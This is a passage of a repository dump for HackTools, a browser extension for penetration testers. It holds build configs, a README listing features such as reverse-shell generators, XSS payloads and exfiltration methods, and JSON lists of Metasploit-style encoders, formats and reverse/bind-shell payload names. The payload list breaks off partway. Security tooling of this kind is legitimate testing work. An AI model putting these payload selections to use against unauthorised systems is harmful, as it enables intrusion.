[ { "path": ".babelrc", "content": "{\r\n \"presets\": [\r\n [\r\n \"@babel/preset-env\",\r\n {\r\n \"modules\": false\r\n }\r\n ],\r\n \"@babel/preset-react\"\r\n ],\r\n \"plugins\": [\r\n \"react-hot-loader/babel\"\r\n ]\r\n}" }, { "path": ".gitignore", "content": "/.git\n/node_modules\n/dist\n.DS_Store\nyarn.lock\npackage-lock.json\nyarn-error.log\n.scannerwork\n.vscode\n.idea\n.github\npnpm-lock.yaml\nbundle*.zip\n" }, { "path": "README.md", "content": "
\n \"logo_hack_tools\"\n

Welcome to HackTools !

\n

\n \"Version\"\n \n \"mozilla\"\n \n \n \"chrome-extension\"\n \n \n \"safari-extension\"\n \n \"Downloads\"\n \n \"RawSecInventory\"\n \n

\n

\n Introduction\n   —  \n Preview\n   —  \n Install\n   —  \n Build\n   —  \n Support\n

\n
\n\n---\n\n>[!NOTE] \n>Psst... Loved HackTools? 👀\n>\n>Check out [Penflow](https://github.com/rb-x/penflow) - our new security testing companion!\n>Try it at [map.penflow.sh](https://map.penflow.sh) 🚀\n\n>[!NOTE] \n>Dear Users,\n>\n>We're excited to announce a major revamp of our app! Due to recent changes and multiple complications with the browser extension environment, we have decided to develop HackTools as a web application moving forward.\n>\n>To keep you engaged, we have uploaded our latest browser extension build alpha at this link: [https://hacktools.sh](https://hacktools.sh/)\n>\n>Stay tuned for exciting new features and improvements coming soon!\n>\n>Thank you for your support.\n\n---\n\n### The all-in-one browser extension for **offensive security professionals**\n\nHackTools, is a web extension facilitating your **web application penetration tests**, it includes **cheat sheets** as well as all the **tools** used during a test such as XSS payloads, Reverse shells and much more.\n\nWith the extension you **no longer need to search for payloads in different websites** or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in pop up mode or in a whole tab in the Devtools part of the browser with F12.\n\n### Current functions\n\n- Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)\n- Shell Spawning (TTY Shell Spawning)\n- XSS Payloads\n- Basic SQLi payloads\n- Local file inclusion payloads (LFI)\n- Base64 Encoder / Decoder\n- Hash Generator (MD5, SHA1, SHA256, SHA512, SM3)\n- Useful Linux commands (Port Forwarding, SUID)\n- Various method of data exfiltration and download from a remote machine\n\n#### Command Palette\n\nWith the new version of the extension, a command panel has been added in order to facilitate the use of the experience. The command panel allows you to access all the functions of the extension in a few keystrokes.\n\nTo open the command palette, you can use the shortcut CTRL + K or + K on macOS.\n\n- You can use the and arrow keys to navigate through the different commands.\n- Enter to validate your choice.\n- + L to toggle the dark theme.\n- CTRL + ALT + 1,2,3,4 to switch between the different tabs.\n\n## Preview\n\n
\n \"preview_2\"\n
\n\n
\n \"preview_3\"\n
\n\n
\n \"preview_4\"\n
\n\n
\n \"preview_5\"\n
\n\n
\n \"preview_6\"\n
\n\n# Install the extension\n\n

\n \"chromium_icon\"\n Chromium based browser\n

\n\nYou can download the **latest build** [here.](https://github.com/LasCC/Hack-Tools/releases)\n\nOr, you can download the extension on the **chrome web store** [here.](https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi)\n\nOtherwise, you can build the project yourself from the source code\n\n

\n \"firefox_icon\" \n Mozilla Firefox\n

\n\nYou can download **HackTools** on the Firefox browser add-ons [here.](https://addons.mozilla.org/en-US/firefox/addon/hacktools/)\n\n

\n \"safari_icon\" \n Instructions to build for Safari\n

\n\nCreate a safari web extension project using the command below. _This is to be run once._\n\n```bash\nxcrun safari-web-extension-coverter [path_to_dist_folder]\n```\n\nFollow the instructions to create the project the default language should be Swift.\n\n- Build project.\n- Open Safari and enable unsigned extensions; Develop -> Allow Unsigned Extensions.\n- Open Safari -> Preferences -> Extensions and enable Hack-Tools\n- Click on the extension icon and switch to full screen mode.\n\n_Instructions provided by [jayluxferro](https://github.com/LasCC/Hack-Tools/issues/88)_\n\n### Build from source code\n\n```bash\ngit clone https://github.com/LasCC/Hack-Tools.git\ncd Hack-Tools\nnpm install && npm run build\n```\n\nOnce the build is done correctly, webpack will create a new folder called **dist**\n\nAfter that you need to go to the **extension** tab on your chrome based navigator and turn on the **developer mode**\n\n\"extension_tutorial\"\n\nThen click on the **load unpacked** button in the top left corner\n\n\"extension_tutorial\"\n\nOnce you clicked on the button you just need to select the **dist folder** and that's it ! 🎉\n\n\"extension_tutorial\"\n\n## Authors\n\n👤 **Ludovic COULON** & **Riadh BOUCHAHOUA**\n\n## Show your support\n\nYou can give a ⭐️ if this project helped you !\n\nNote that this project is maintained, developed and made available for **free**, you can offer us a coffee, it will be very **encouraging and greatly appreciated** 😊\n\n\"Paypal\"\n" }, { "path": "package.json", "content": "{\n \"name\": \"hack-tools\",\n \"version\": \"1.0.0\",\n \"description\": \"The all in one Red team browser extension for web pentesters\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"start\": \"webpack --watch\",\n \"build\": \"webpack --mode production && rm -f ./dist/*.map\",\n \"watch\": \"webpack --watch\",\n \"zip_chrome\": \"rm -f './dist/*.map' && zip -r bundle_chrome.zip dist/\",\n \"zip_moz\": \" rm -f './dist/*.map' && sed -i 's/\\\"manifest_version\\\": 3/\\\"manifest_version\\\": 2/g' ./dist/manifest.json && sed -i 's/\\\"action\\\":/\\\"browser_action\\\":/g' ./dist/manifest.json & zip -r bundle_moz.zip dist/*\",\n \"zip_all\": \"yarn zip_chrome && yarn zip_moz\",\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\"\n },\n \"keywords\": [],\n \"author\": \"Ludovic COULON & Riadh BOUCHAHOUA\",\n \"license\": \"MIT\",\n \"devDependencies\": {\n \"@babel/cli\": \"^7.21.0\",\n \"@babel/core\": \"^7.21.0\",\n \"@babel/helper-call-delegate\": \"^7.12.13\",\n \"@babel/plugin-proposal-class-properties\": \"^7.18.6\",\n \"@babel/preset-env\": \"^7.20.2\",\n \"@babel/preset-react\": \"^7.18.6\",\n \"@babel/preset-typescript\": \"^7.21.0\",\n \"@pmmmwh/react-refresh-webpack-plugin\": \"^0.5.10\",\n \"@types/crypto-js\": \"^4.1.1\",\n \"@types/pretty\": \"^2.0.1\",\n \"@types/react-syntax-highlighter\": \"^15.5.6\",\n \"@types/use-persisted-state\": \"^0.3.1\",\n \"babel-loader\": \"^9.1.2\",\n \"clean-webpack-plugin\": \"^4.0.0\",\n \"copy-webpack-plugin\": \"^11.0.0\",\n \"css-loader\": \"^6.7.3\",\n \"file-loader\": \"^6.2.0\",\n \"html-webpack-plugin\": \"^5.5.0\",\n \"react-hot-loader\": \"^4.13.1\",\n \"react-refresh\": \"^0.14.0\",\n \"style-loader\": \"^3.3.1\",\n \"typescript\": \"^4.9.5\",\n \"webpack\": \"^5.76.1\",\n \"webpack-cli\": \"^5.0.1\",\n \"webpack-dev-server\": \"^4.11.1\"\n },\n \"browserslist\": [\n \">0.2%\",\n \"not dead\",\n \"not op_mini all\"\n ],\n \"dependencies\": {\n \"@ant-design/compatible\": \"^5.1.1\",\n \"@ant-design/cssinjs\": \"^1.6.1\",\n \"@ant-design/icons\": \"4.8.0\",\n \"@ant-design/pro-card\": \"^2.3.0\",\n \"@ant-design/pro-layout\": \"^7.10.0\",\n \"@hot-loader/react-dom\": \"^17.0.2\",\n \"@types/chrome\": \"^0.0.206\",\n \"@types/jest\": \"^29.4.0\",\n \"@types/node\": \"^18.15.0\",\n \"@types/react\": \"^18.0.28\",\n \"@types/react-dom\": \"^18.0.11\",\n \"@uiw/react-md-editor\": \"^3.20.5\",\n \"antd\": \"5.1.0\",\n \"antd-mask-input\": \"2.0.7\",\n \"axios\": \"^1.3.4\",\n \"crypto-js\": \"^4.1.1\",\n \"darkreader\": \"^4.9.58\",\n \"escape-quotes\": \"^1.0.2\",\n \"less\": \"^4.1.3\",\n \"less-loader\": \"^11.1.0\",\n \"mermaid\": \"^9.4.3\",\n \"pretty\": \"^2.0.0\",\n \"rc-queue-anim\": \"^2.0.0\",\n \"react\": \"^18.2.0\",\n \"react-chrome-extension-router\": \"^1.4.0\",\n \"react-clipboard.js\": \"2.0.16\",\n \"react-color\": \"^2.19.3\",\n \"react-dom\": \"^18.2.0\",\n \"react-highlight-words\": \"^0.18.0\",\n \"react-query\": \"^3.39.3\",\n \"react-refresh-typescript\": \"^2.0.8\",\n \"react-syntax-highlighter\": \"^15.5.0\",\n \"sm3\": \"^1.0.3\",\n \"ts-loader\": \"^9.4.2\",\n \"use-persisted-state\": \"^0.3.3\"\n }\n}" }, { "path": "src/App.tsx", "content": "import React from 'react';\r\nimport ReactDOM from 'react-dom';\r\nimport { Router } from 'react-chrome-extension-router';\r\nimport { FloatButton } from 'antd';\r\nimport { QueryClientProvider, QueryClient } from 'react-query';\r\nimport LayoutApp from './components/LayoutApp';\r\nimport ReverseShell from './components/linux/ReverseShell';\r\nimport './assets/css/style.css';\r\n\r\nconst queryClient = new QueryClient();\r\n\r\nconst App = () => {\r\n return (\r\n
\r\n \r\n
\r\n );\r\n};\r\n\r\n\r\nReactDOM.render(\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ,\r\n document.getElementById( 'app' )\r\n);\r\n" }, { "path": "src/assets/css/style.css", "content": ".logo:hover {\r\n cursor: pointer;\r\n animation: jelly 0.5s;\r\n}\r\n\r\n.logo {\r\n padding-left: 17px;\r\n padding-top: 14px;\r\n margin-bottom: 10px;\r\n}\r\n\r\n@keyframes jelly {\r\n\r\n 0%,\r\n 100% {\r\n transform: scale(1, 1);\r\n }\r\n\r\n 25% {\r\n transform: scale(0.9, 1.1);\r\n }\r\n\r\n 50% {\r\n transform: scale(1.1, 0.9);\r\n }\r\n\r\n 75% {\r\n transform: scale(0.95, 1.05);\r\n }\r\n}\r\n\r\n.ant-badge {\r\n color: inherit !important;\r\n}\r\n\r\n.site-layout .site-layout-background {\r\n border-radius: 10px;\r\n}\r\n\r\n.ant-menu-inline .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-left .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-right .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical .ant-menu-item:not(:last-child) {\r\n margin: 0px !important;\r\n}\r\n\r\n.ant-menu-dark.ant-menu-inline .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical-left .ant-menu-item,\r\n.ant-menu-dark.ant-menu-vertical-right .ant-menu-item {\r\n left: 4px !important;\r\n margin-left: 0 !important;\r\n border-right: 0 !important;\r\n}\r\n\r\n.ant-menu-vertical .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-left .ant-menu-item:not(:last-child),\r\n.ant-menu-vertical-right .ant-menu-item:not(:last-child),\r\n.ant-menu-inline .ant-menu-item:not(:last-child) {\r\n margin: 0 !important;\r\n}\r\n\r\n.ant-menu-inline-collapsed>.ant-menu-item,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title {\r\n left: 0 !important;\r\n padding: 2px calc(50% - 25px / 2) !important;\r\n text-overflow: clip !important;\r\n}\r\n\r\n.ant-menu-vertical>.ant-menu-item,\r\n.ant-menu-vertical-left>.ant-menu-item,\r\n.ant-menu-vertical-right>.ant-menu-item,\r\n.ant-menu-inline>.ant-menu-item,\r\n.ant-menu-vertical>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-vertical-left>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-vertical-right>.ant-menu-submenu>.ant-menu-submenu-title,\r\n.ant-menu-inline>.ant-menu-submenu>.ant-menu-submenu-title {\r\n height: 35px !important;\r\n line-height: 35px !important;\r\n}\r\n\r\n.ant-menu-inline-collapsed>.ant-menu-item .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title .ant-menu-item-icon,\r\n.ant-menu-inline-collapsed>.ant-menu-item .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-item .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-item-group>.ant-menu-item-group-list>.ant-menu-submenu>.ant-menu-submenu-title .anticon,\r\n.ant-menu-inline-collapsed>.ant-menu-submenu>.ant-menu-submenu-title .anticon {\r\n margin: 0 !important;\r\n font-size: 18px !important;\r\n line-height: 32px !important;\r\n}\r\n\r\n.iconfont {\r\n font-family: \"iconfont\";\r\n margin: 0;\r\n font-size: 14px;\r\n line-height: 32px;\r\n font-style: normal;\r\n -webkit-font-smoothing: antialiased;\r\n -moz-osx-font-smoothing: grayscale;\r\n}\r\n\r\nbody {\r\n min-width: 750px;\r\n min-height: auto;\r\n margin: 0px !important;\r\n font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;\r\n font-size: 14px;\r\n}" }, { "path": "src/assets/data/Encoder.json", "content": "[\n\t{ \"value\": \"cmd/echo\" },\n\t{ \"value\": \"cmd/generic_sh\" },\n\t{ \"value\": \"cmd/ifs\" },\n\t{ \"value\": \"cmd/perl\" },\n\t{ \"value\": \"cmd/powershell_base64\" },\n\t{ \"value\": \"cmd/printf_php_mq\" },\n\t{ \"value\": \"generic/eicar\" },\n\t{ \"value\": \"generic/none\" },\n\t{ \"value\": \"mipsbe/byte_xori\" },\n\t{ \"value\": \"mipsbe/longxor\" },\n\t{ \"value\": \"mipsle/byte_xori\" },\n\t{ \"value\": \"mipsle/longxor\" },\n\t{ \"value\": \"php/base64\" },\n\t{ \"value\": \"ppc/longxor\" },\n\t{ \"value\": \"ppc/longxor_tag\" },\n\t{ \"value\": \"ruby/base64\" },\n\t{ \"value\": \"sparc/longxor_tag\" },\n\t{ \"value\": \"x64/xor\" },\n\t{ \"value\": \"x64/zutto_dekiru\" },\n\t{ \"value\": \"x86/add_sub\" },\n\t{ \"value\": \"x86/alpha_mixed\" },\n\t{ \"value\": \"x86/alpha_upper\" },\n\t{ \"value\": \"x86/avoid_underscore_tolower\" },\n\t{ \"value\": \"x86/avoid_utf8_tolower\" },\n\t{ \"value\": \"x86/bloxor\" },\n\t{ \"value\": \"x86/bmp_polyglot\" },\n\t{ \"value\": \"x86/call4_dword_xor\" },\n\t{ \"value\": \"x86/context_cpuid\" },\n\t{ \"value\": \"x86/context_stat\" },\n\t{ \"value\": \"x86/context_time\" },\n\t{ \"value\": \"x86/countdown\" },\n\t{ \"value\": \"x86/fnstenv_mov\" },\n\t{ \"value\": \"x86/jmp_call_additive\" },\n\t{ \"value\": \"x86/nonalpha\" },\n\t{ \"value\": \"x86/nonupper\" },\n\t{ \"value\": \"x86/opt_sub\" },\n\t{ \"value\": \"x86/service\" },\n\t{ \"value\": \"x86/shikata_ga_nai\" },\n\t{ \"value\": \"x86/single_static_bit\" },\n\t{ \"value\": \"x86/unicode_mixed\" },\n\t{ \"value\": \"x86/unicode_upper\" }\n]\n" }, { "path": "src/assets/data/Format.json", "content": "[\n\t{ \"value\": \"asp\" },\n\t{ \"value\": \"aspx\" },\n\t{ \"value\": \"aspx-exe\" },\n\t{ \"value\": \"axis2\" },\n\t{ \"value\": \"bash\" },\n\t{ \"value\": \"c\" },\n\t{ \"value\": \"csharp\" },\n\t{ \"value\": \"dll\" },\n\t{ \"value\": \"dw\" },\n\t{ \"value\": \"dword\" },\n\t{ \"value\": \"elf\" },\n\t{ \"value\": \"elf-so\" },\n\t{ \"value\": \"exe\" },\n\t{ \"value\": \"exe-only\" },\n\t{ \"value\": \"exe-service\" },\n\t{ \"value\": \"exe-small\" },\n\t{ \"value\": \"hex\" },\n\t{ \"value\": \"hta-psh\" },\n\t{ \"value\": \"jar\" },\n\t{ \"value\": \"java\" },\n\t{ \"value\": \"js_be\" },\n\t{ \"value\": \"js_le\" },\n\t{ \"value\": \"jsp\" },\n\t{ \"value\": \"loop-vbs\" },\n\t{ \"value\": \"macho\" },\n\t{ \"value\": \"msi\" },\n\t{ \"value\": \"msi-nouac\" },\n\t{ \"value\": \"num\" },\n\t{ \"value\": \"osx-app\" },\n\t{ \"value\": \"perl\" },\n\t{ \"value\": \"pl\" },\n\t{ \"value\": \"powershell\" },\n\t{ \"value\": \"ps1\" },\n\t{ \"value\": \"psh\" },\n\t{ \"value\": \"psh-cmd\" },\n\t{ \"value\": \"psh-net\" },\n\t{ \"value\": \"psh-reflection\" },\n\t{ \"value\": \"py\" },\n\t{ \"value\": \"python\" },\n\t{ \"value\": \"raw\" },\n\t{ \"value\": \"rb\" },\n\t{ \"value\": \"ruby\" },\n\t{ \"value\": \"sh\" },\n\t{ \"value\": \"vba\" },\n\t{ \"value\": \"vba-exe\" },\n\t{ \"value\": \"vbapplication\" },\n\t{ \"value\": \"vba-psh\" },\n\t{ \"value\": \"vbs\" },\n\t{ \"value\": \"vbscript\" },\n\t{ \"value\": \"war\" }\n]\n" }, { "path": "src/assets/data/Payloads.json", "content": "[\n\t{ \"value\": \"aix/ppc/shell_bind_tcp\" },\n\t{ \"value\": \"aix/ppc/shell_find_port\" },\n\t{ \"value\": \"aix/ppc/shell_interact\" },\n\t{ \"value\": \"aix/ppc/shell_reverse_tcp\" },\n\t{ \"value\": \"android/meterpreter/reverse_http\" },\n\t{ \"value\": \"android/meterpreter/reverse_https\" },\n\t{ \"value\": \"android/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"android/meterpreter_reverse_http\" },\n\t{ \"value\": \"android/meterpreter_reverse_https\" },\n\t{ \"value\": \"android/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"android/shell/reverse_http\" },\n\t{ \"value\": \"android/shell/reverse_https\" },\n\t{ \"value\": \"android/shell/reverse_tcp\" },\n\t{ \"value\": \"apple_ios/aarch64/meterpreter_reverse_http\" },\n\t{ \"value\": \"apple_ios/aarch64/meterpreter_reverse_https\" },\n\t{ \"value\": \"apple_ios/aarch64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"apple_ios/aarch64/shell_reverse_tcp\" },\n\t{ \"value\": \"bsd/sparc/shell_bind_tcp\" },\n\t{ \"value\": \"bsd/sparc/shell_reverse_tcp\" },\n\t{ \"value\": \"bsd/x64/exec\" },\n\t{ \"value\": \"bsd/x64/shell_bind_ipv6_tcp\" },\n\t{ \"value\": \"bsd/x64/shell_bind_tcp\" },\n\t{ \"value\": \"bsd/x64/shell_bind_tcp_small\" },\n\t{ \"value\": \"bsd/x64/shell_reverse_ipv6_tcp\" },\n\t{ \"value\": \"bsd/x64/shell_reverse_tcp\" },\n\t{ \"value\": \"bsd/x64/shell_reverse_tcp_small\" },\n\t{ \"value\": \"bsd/x86/exec\" },\n\t{ \"value\": \"bsd/x86/metsvc_bind_tcp\" },\n\t{ \"value\": \"bsd/x86/metsvc_reverse_tcp\" },\n\t{ \"value\": \"bsd/x86/shell/bind_ipv6_tcp\" },\n\t{ \"value\": \"bsd/x86/shell/bind_tcp\" },\n\t{ \"value\": \"bsd/x86/shell/find_tag\" },\n\t{ \"value\": \"bsd/x86/shell/reverse_ipv6_tcp\" },\n\t{ \"value\": \"bsd/x86/shell/reverse_tcp\" },\n\t{ \"value\": \"bsd/x86/shell_bind_tcp\" },\n\t{ \"value\": \"bsd/x86/shell_bind_tcp_ipv6\" },\n\t{ \"value\": \"bsd/x86/shell_find_port\" },\n\t{ \"value\": \"bsd/x86/shell_find_tag\" },\n\t{ \"value\": \"bsd/x86/shell_reverse_tcp\" },\n\t{ \"value\": \"bsd/x86/shell_reverse_tcp_ipv6\" },\n\t{ \"value\": \"bsdi/x86/shell/bind_tcp\" },\n\t{ \"value\": \"bsdi/x86/shell/reverse_tcp\" },\n\t{ \"value\": \"bsdi/x86/shell_bind_tcp\" },\n\t{ \"value\": \"bsdi/x86/shell_find_port\" },\n\t{ \"value\": \"bsdi/x86/shell_reverse_tcp\" },\n\t{ \"value\": \"cmd/mainframe/apf_privesc_jcl\" },\n\t{ \"value\": \"cmd/mainframe/bind_shell_jcl\" },\n\t{ \"value\": \"cmd/mainframe/generic_jcl\" },\n\t{ \"value\": \"cmd/mainframe/reverse_shell_jcl\" },\n\t{ \"value\": \"cmd/unix/bind_awk\" },\n\t{ \"value\": \"cmd/unix/bind_inetd\" },\n\t{ \"value\": \"cmd/unix/bind_lua\" },\n\t{ \"value\": \"cmd/unix/bind_netcat\" },\n\t{ \"value\": \"cmd/unix/bind_netcat_gaping\" },\n\t{ \"value\": \"cmd/unix/bind_netcat_gaping_ipv6\" },\n\t{ \"value\": \"cmd/unix/bind_nodejs\" },\n\t{ \"value\": \"cmd/unix/bind_perl\" },\n\t{ \"value\": \"cmd/unix/bind_perl_ipv6\" },\n\t{ \"value\": \"cmd/unix/bind_r\" },\n\t{ \"value\": \"cmd/unix/bind_ruby\" },\n\t{ \"value\": \"cmd/unix/bind_ruby_ipv6\" },\n\t{ \"value\": \"cmd/unix/bind_socat_udp\" },\n\t{ \"value\": \"cmd/unix/bind_stub\" },\n\t{ \"value\": \"cmd/unix/bind_zsh\" },\n\t{ \"value\": \"cmd/unix/generic\" },\n\t{ \"value\": \"cmd/unix/interact\" },\n\t{ \"value\": \"cmd/unix/reverse\" },\n\t{ \"value\": \"cmd/unix/reverse_awk\" },\n\t{ \"value\": \"cmd/unix/reverse_bash\" },\n\t{ \"value\": \"cmd/unix/reverse_bash_telnet_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_ksh\" },\n\t{ \"value\": \"cmd/unix/reverse_lua\" },\n\t{ \"value\": \"cmd/unix/reverse_ncat_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_netcat\" },\n\t{ \"value\": \"cmd/unix/reverse_netcat_gaping\" },\n\t{ \"value\": \"cmd/unix/reverse_nodejs\" },\n\t{ \"value\": \"cmd/unix/reverse_openssl\" },\n\t{ \"value\": \"cmd/unix/reverse_perl\" },\n\t{ \"value\": \"cmd/unix/reverse_perl_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_php_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_python\" },\n\t{ \"value\": \"cmd/unix/reverse_python_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_r\" },\n\t{ \"value\": \"cmd/unix/reverse_ruby\" },\n\t{ \"value\": \"cmd/unix/reverse_ruby_ssl\" },\n\t{ \"value\": \"cmd/unix/reverse_socat_udp\" },\n\t{ \"value\": \"cmd/unix/reverse_ssl_double_telnet\" },\n\t{ \"value\": \"cmd/unix/reverse_stub\" },\n\t{ \"value\": \"cmd/unix/reverse_zsh\" },\n\t{ \"value\": \"cmd/windows/adduser\" },\n\t{ \"value\": \"cmd/windows/bind_lua\" },\n\t{ \"value\": \"cmd/windows/bind_perl\" },\n\t{ \"value\": \"cmd/windows/bind_perl_ipv6\" },\n\t{ \"value\": \"cmd/windows/bind_ruby\" },\n\t{ \"value\": \"cmd/windows/download_eval_vbs\" },\n\t{ \"value\": \"cmd/windows/download_exec_vbs\" },\n\t{ \"value\": \"cmd/windows/generic\" },\n\t{ \"value\": \"cmd/windows/powershell_bind_tcp\" },\n\t{ \"value\": \"cmd/windows/powershell_reverse_tcp\" },\n\t{ \"value\": \"cmd/windows/reverse_lua\" },\n\t{ \"value\": \"cmd/windows/reverse_perl\" },\n\t{ \"value\": \"cmd/windows/reverse_powershell\" },\n\t{ \"value\": \"cmd/windows/reverse_ruby\" },\n\t{ \"value\": \"firefox/exec\" },\n\t{ \"value\": \"firefox/shell_bind_tcp\" },\n\t{ \"value\": \"firefox/shell_reverse_tcp\" },\n\t{ \"value\": \"generic/custom\" },\n\t{ \"value\": \"generic/debug_trap\" },\n\t{ \"value\": \"generic/shell_bind_tcp\" },\n\t{ \"value\": \"generic/shell_reverse_tcp\" },\n\t{ \"value\": \"generic/tight_loop\" },\n\t{ \"value\": \"java/jsp_shell_bind_tcp\" },\n\t{ \"value\": \"java/jsp_shell_reverse_tcp\" },\n\t{ \"value\": \"java/meterpreter/bind_tcp\" },\n\t{ \"value\": \"java/meterpreter/reverse_http\" },\n\t{ \"value\": \"java/meterpreter/reverse_https\" },\n\t{ \"value\": \"java/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"java/shell/bind_tcp\" },\n\t{ \"value\": \"java/shell/reverse_tcp\" },\n\t{ \"value\": \"java/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/aarch64/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/aarch64/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/aarch64/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/aarch64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/aarch64/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/aarch64/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/armbe/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/armbe/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/armbe/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/armbe/shell_bind_tcp\" },\n\t{ \"value\": \"linux/armle/adduser\" },\n\t{ \"value\": \"linux/armle/exec\" },\n\t{ \"value\": \"linux/armle/meterpreter/bind_tcp\" },\n\t{ \"value\": \"linux/armle/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/armle/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/armle/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/armle/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/armle/shell/bind_tcp\" },\n\t{ \"value\": \"linux/armle/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/armle/shell_bind_tcp\" },\n\t{ \"value\": \"linux/armle/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/mips64/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/mips64/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/mips64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/mipsbe/exec\" },\n\t{ \"value\": \"linux/mipsbe/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/mipsbe/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/mipsbe/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/mipsbe/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/mipsbe/reboot\" },\n\t{ \"value\": \"linux/mipsbe/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/mipsbe/shell_bind_tcp\" },\n\t{ \"value\": \"linux/mipsbe/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/mipsle/exec\" },\n\t{ \"value\": \"linux/mipsle/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/mipsle/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/mipsle/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/mipsle/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/mipsle/reboot\" },\n\t{ \"value\": \"linux/mipsle/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/mipsle/shell_bind_tcp\" },\n\t{ \"value\": \"linux/mipsle/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/ppc/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/ppc/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/ppc/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/ppc/shell_bind_tcp\" },\n\t{ \"value\": \"linux/ppc/shell_find_port\" },\n\t{ \"value\": \"linux/ppc/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/ppc64/shell_bind_tcp\" },\n\t{ \"value\": \"linux/ppc64/shell_find_port\" },\n\t{ \"value\": \"linux/ppc64/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/ppc64le/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/ppc64le/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/ppc64le/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/ppce500v2/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/ppce500v2/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/ppce500v2/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/x64/exec\" },\n\t{ \"value\": \"linux/x64/meterpreter/bind_tcp\" },\n\t{ \"value\": \"linux/x64/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/x64/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/x64/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/x64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/x64/shell/bind_tcp\" },\n\t{ \"value\": \"linux/x64/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/x64/shell_bind_tcp\" },\n\t{ \"value\": \"linux/x64/shell_bind_tcp_random_port\" },\n\t{ \"value\": \"linux/x64/shell_find_port\" },\n\t{ \"value\": \"linux/x64/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/x86/adduser\" },\n\t{ \"value\": \"linux/x86/chmod\" },\n\t{ \"value\": \"linux/x86/exec\" },\n\t{ \"value\": \"linux/x86/meterpreter/bind_ipv6_tcp\" },\n\t{ \"value\": \"linux/x86/meterpreter/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/meterpreter/bind_nonx_tcp\" },\n\t{ \"value\": 